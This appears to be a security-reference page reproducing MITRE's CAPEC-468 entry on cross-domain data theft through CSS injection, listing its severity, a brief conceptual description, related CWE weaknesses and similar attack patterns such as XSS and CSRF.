Standardseverity: MediumDraft

CAPEC-468Generic Cross-Browser Cross-Domain Theft

Abstraction
Standard
Status
Draft
Severity
Medium

Description

An attacker makes use of Cascading Style Sheets (CSS) injection to steal data cross domain from the victim's browser. The attack works by abusing the standards relating to loading of CSS: 1. Send cookies on any load of CSS (including cross-domain) 2. When parsing returned CSS ignore all data that does not make sense before a valid CSS descriptor is found by the CSS parser.

Related weaknesses· 4

CWE-707CWE-149CWE-177CWE-838

Related attack patterns· 1

CAPEC-242 (ChildOf)

Exploits4

TypeTargetConfidenceTier
WeaknessInappropriate Encoding for Output Contextcwe-838100%live
WeaknessImproper Neutralizationcwe-707100%live
WeaknessImproper Neutralization of Quoting Syntaxcwe-149100%live
WeaknessImproper Handling of URL Encoding (Hex Encoding)cwe-177100%live

Related by meaning· 6

Nearest entities by semantic similarity across the cs-graph corpus.

CAPEC
Cross Site Tracing
CAPEC
Cross Site Request Forgery
CAPEC
Cross-Site Scripting (XSS)
CAPEC
DOM-Based XSS
CAPEC
Cross Site Identification
CAPEC
XSS Through HTTP Headers
Sourced from MITRE CAPEC. Curated by Adam Lundqvist, SQUR.